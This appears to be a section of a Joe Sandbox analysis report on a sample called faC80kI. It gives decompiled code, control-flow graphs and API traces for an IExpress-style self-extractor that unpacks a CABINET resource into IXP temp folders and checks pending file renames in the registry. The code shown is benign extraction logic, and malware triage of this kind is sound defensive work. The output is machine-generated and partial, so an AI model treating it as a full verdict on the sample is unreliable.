                                                                                                                                                                                                                                            0x00a9515f

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A94FFE
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00A95006
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00A9500D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 00A95030
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00A95037
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 00A9504A
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00A95051
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A95111
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A95159
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                            • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                            • Opcode ID: e281d9e87874cb7c98f9fb93d2d8ae73eaa8c17bccf97de2c4b3b375ab017996
                                                                                                                                                                                                                                            • Instruction ID: 1e4a63e9f21d12e61d3883a5eef60a0892a6cc4067b0d032eec18e6b773eb9f2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e281d9e87874cb7c98f9fb93d2d8ae73eaa8c17bccf97de2c4b3b375ab017996
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB3107B0B407017FEF209BB9AD8AF6736DCB708795F24061BB901A61A1DE788C038790
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A953A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				long _t13;
                                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                                                                                            				_t20 = __ecx;
                                                                                                                                                                                                                                            				_t29 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E00A9171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                            					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                            					_t29 = _t29 + 1;
                                                                                                                                                                                                                                            					E00A91680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                            					E00A9658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                            					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                            					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                            					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t29 < 0x190) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t30 = 0;
                                                                                                                                                                                                                                            					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                            						_t30 = 1;
                                                                                                                                                                                                                                            						DeleteFileA(_t32);
                                                                                                                                                                                                                                            						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return E00A96CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t30 = 1;
                                                                                                                                                                                                                                            				 *0xa98a20 = 1;
                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x00a953ac
                                                                                                                                                                                                                                            0x00a953b3
                                                                                                                                                                                                                                            0x00a953b9
                                                                                                                                                                                                                                            0x00a953bb
                                                                                                                                                                                                                                            0x00a953bd
                                                                                                                                                                                                                                            0x00a953bf
                                                                                                                                                                                                                                            0x00a953d1
                                                                                                                                                                                                                                            0x00a953d6
                                                                                                                                                                                                                                            0x00a953e0
                                                                                                                                                                                                                                            0x00a953e2
                                                                                                                                                                                                                                            0x00a953f5
                                                                                                                                                                                                                                            0x00a953fb
                                                                                                                                                                                                                                            0x00a95402
                                                                                                                                                                                                                                            0x00a9540b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95413
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95415
                                                                                                                                                                                                                                            0x00a95416
                                                                                                                                                                                                                                            0x00a95427
                                                                                                                                                                                                                                            0x00a9542a
                                                                                                                                                                                                                                            0x00a9542b
                                                                                                                                                                                                                                            0x00a95434
                                                                                                                                                                                                                                            0x00a95434
                                                                                                                                                                                                                                            0x00a9543a
                                                                                                                                                                                                                                            0x00a9544c
                                                                                                                                                                                                                                            0x00a9544c
                                                                                                                                                                                                                                            0x00a95452
                                                                                                                                                                                                                                            0x00a9545a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9545e
                                                                                                                                                                                                                                            0x00a9545f
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9171E: _vsnprintf.MSVCRT ref: 00A91750
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A953FB
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95402
                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9541F
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9542B
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95434
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95452
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                            • API String ID: 1082909758-7194216
                                                                                                                                                                                                                                            • Opcode ID: 0f9fbdeb4d698ed051bc2a18fb6d6bdfb0156862a0561037a0cdb852bfd1e020
                                                                                                                                                                                                                                            • Instruction ID: 8635cb46836e4ae66b512fdc8b20d6126ee7a366eb4168103feabfbf0b5f4f57
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f9fbdeb4d698ed051bc2a18fb6d6bdfb0156862a0561037a0cdb852bfd1e020
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB110171B0050467DB21EB769D4AFAF36AEEFD2311F000127B646D2190CE74898387A2
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 478 a95467-a95484 479 a9548a-a95490 call a953a1 478->479 480 a9551c-a95528 call a91680 478->480 483 a95495-a95497 479->483 484 a9552d-a95539 call a958c8 480->484 485 a9549d-a954c0 call a91781 483->485 486 a95581-a95583 483->486 493 a9553b-a95545 CreateDirectoryA 484->493 494 a9554d-a95552 484->494 495 a9550c-a9551a call a9658a 485->495 496 a954c2-a954d8 GetSystemInfo 485->496 489 a9558d-a9559d call a96ce0 486->489 498 a95577-a9557c call a96285 493->498 499 a95547 493->499 500 a95585-a9558b 494->500 501 a95554-a95557 call a9597d 494->501 495->484 504 a954da-a954dd 496->504 505 a954fe 496->505 498->486 499->494 500->489 511 a9555c-a9555e 501->511 509 a954df-a954e2 504->509 510 a954f7-a954fc 504->510 512 a95503-a95507 call a9658a 505->512 514 a954f0-a954f5 509->514 515 a954e4-a954e7 509->515 510->512 511->500 516 a95560-a95566 511->516 512->495 514->512 515->495 518 a954e9-a954ee 515->518 516->486 517 a95568-a95575 RemoveDirectoryA 516->517 517->486 518->512
                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A95467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR* _t48;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t10 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                                            					_t48 = 0xa991e4;
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E00A91680(0xa991e4, 0x104);
                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                            					_t13 = E00A958C8(_t48); // executed
                                                                                                                                                                                                                                            					if(_t13 != 0) {
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						_t42 = _a4;
                                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							 *0xa99124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                                            							return E00A96CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t16 = E00A9597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                            						if(_t16 != 0) {
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t61 =  *0xa98a20; // 0x0
                                                                                                                                                                                                                                            						if(_t61 != 0) {
                                                                                                                                                                                                                                            							 *0xa98a20 = 0;
                                                                                                                                                                                                                                            							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L22:
                                                                                                                                                                                                                                            						_t14 = 0;
                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                            						 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa98a20 = 1;
                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 =  &_v268;
                                                                                                                                                                                                                                            				_t20 = E00A953A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                            				if(_t20 == 0) {
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t48 = 0xa991e4;
                                                                                                                                                                                                                                            				E00A91781(0xa991e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                            				if(( *0xa99a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E00A9658A(_t48, 0x104, 0xa91140);
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                            				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					_push("i386");
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					E00A9658A(_t48, 0x104);
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = _t26 - 1;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					_push("mips");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = _t28 - 1;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					_push("alpha");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t29 != 1) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push("ppc");
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            0x00a95472
                                                                                                                                                                                                                                            0x00a95479
                                                                                                                                                                                                                                            0x00a95481
                                                                                                                                                                                                                                            0x00a95484
                                                                                                                                                                                                                                            0x00a9551c
                                                                                                                                                                                                                                            0x00a95521
                                                                                                                                                                                                                                            0x00a95528
                                                                                                                                                                                                                                            0x00a9552d
                                                                                                                                                                                                                                            0x00a9552f
                                                                                                                                                                                                                                            0x00a95539
                                                                                                                                                                                                                                            0x00a9554d
                                                                                                                                                                                                                                            0x00a9554d
                                                                                                                                                                                                                                            0x00a95552
                                                                                                                                                                                                                                            0x00a95585
                                                                                                                                                                                                                                            0x00a95585
                                                                                                                                                                                                                                            0x00a9558b
                                                                                                                                                                                                                                            0x00a9558d
                                                                                                                                                                                                                                            0x00a9559d
                                                                                                                                                                                                                                            0x00a9559d
                                                                                                                                                                                                                                            0x00a95557
                                                                                                                                                                                                                                            0x00a9555e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95560
                                                                                                                                                                                                                                            0x00a95566
                                                                                                                                                                                                                                            0x00a95569
                                                                                                                                                                                                                                            0x00a9556f
                                                                                                                                                                                                                                            0x00a9556f
                                                                                                                                                                                                                                            0x00a95581
                                                                                                                                                                                                                                            0x00a95581
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95581
                                                                                                                                                                                                                                            0x00a95545
                                                                                                                                                                                                                                            0x00a9557c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9557c
                                                                                                                                                                                                                                            0x00a95547
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95547
                                                                                                                                                                                                                                            0x00a9548a
                                                                                                                                                                                                                                            0x00a95490
                                                                                                                                                                                                                                            0x00a95497
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9549d
                                                                                                                                                                                                                                            0x00a954ab
                                                                                                                                                                                                                                            0x00a954b4
                                                                                                                                                                                                                                            0x00a954c0
                                                                                                                                                                                                                                            0x00a9550c
                                                                                                                                                                                                                                            0x00a95511
                                                                                                                                                                                                                                            0x00a95515
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95515
                                                                                                                                                                                                                                            0x00a954c9
                                                                                                                                                                                                                                            0x00a954d6
                                                                                                                                                                                                                                            0x00a954d8
                                                                                                                                                                                                                                            0x00a954fe
                                                                                                                                                                                                                                            0x00a95503
                                                                                                                                                                                                                                            0x00a95507
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95507
                                                                                                                                                                                                                                            0x00a954da
                                                                                                                                                                                                                                            0x00a954dd
                                                                                                                                                                                                                                            0x00a954f7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a954f7
                                                                                                                                                                                                                                            0x00a954df
                                                                                                                                                                                                                                            0x00a954e2
                                                                                                                                                                                                                                            0x00a954f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a954f0
                                                                                                                                                                                                                                            0x00a954e7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a954e9
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A954C9
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9553D
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9556F
                                                                                                                                                                                                                                              • Part of subcall function 00A953A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A953FB
                                                                                                                                                                                                                                              • Part of subcall function 00A953A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95402
                                                                                                                                                                                                                                              • Part of subcall function 00A953A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9541F
                                                                                                                                                                                                                                              • Part of subcall function 00A953A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9542B
                                                                                                                                                                                                                                              • Part of subcall function 00A953A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95434
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                            • API String ID: 1979080616-3696344869
                                                                                                                                                                                                                                            • Opcode ID: 019e83e2a9e843aaae6e1ba322b291924334c12233786091af219ae4b2bd76dc
                                                                                                                                                                                                                                            • Instruction ID: 1a5339ee3879f4dccc142557a0bca129dfbf39e2eeaa8835f2345baf5bd5391e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 019e83e2a9e843aaae6e1ba322b291924334c12233786091af219ae4b2bd76dc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68313571F00A01ABCF16AFB99D4697F73EBBB85340F16012BA906DA552DF70CE028785
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 519 a9256d-a9257d 520 a92583-a92589 519->520 521 a92622-a92627 call a924e0 519->521 523 a925e8-a92607 RegOpenKeyExA 520->523 524 a9258b 520->524 528 a92629-a9262f 521->528 525 a92609-a92620 RegQueryInfoKeyA 523->525 526 a925e3-a925e6 523->526 524->528 529 a92591-a92595 524->529 530 a925d1-a925dd RegCloseKey 525->530 526->528 529->528 531 a9259b-a925ba RegOpenKeyExA 529->531 530->526 531->526 532 a925bc-a925cb RegQueryValueExA 531->532 532->530
                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A9256D(signed int __ecx) {
                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                            				int _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t31 = E00A924E0(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t34 = _t13 - 1;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                            						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                            							_v8 = 0;
                                                                                                                                                                                                                                            							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                            							if(_t24 == 0) {
                                                                                                                                                                                                                                            								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                            								L6:
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                            								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							_t31 = _v8;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a92572
                                                                                                                                                                                                                                            0x00a92573
                                                                                                                                                                                                                                            0x00a92575
                                                                                                                                                                                                                                            0x00a92578
                                                                                                                                                                                                                                            0x00a9257d
                                                                                                                                                                                                                                            0x00a92627
                                                                                                                                                                                                                                            0x00a92583
                                                                                                                                                                                                                                            0x00a92586
                                                                                                                                                                                                                                            0x00a92589
                                                                                                                                                                                                                                            0x00a925eb
                                                                                                                                                                                                                                            0x00a92607
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92609
                                                                                                                                                                                                                                            0x00a9261a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9261a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9258b
                                                                                                                                                                                                                                            0x00a9258b
                                                                                                                                                                                                                                            0x00a9259e
                                                                                                                                                                                                                                            0x00a925b2
                                                                                                                                                                                                                                            0x00a925ba
                                                                                                                                                                                                                                            0x00a925cb
                                                                                                                                                                                                                                            0x00a925d1
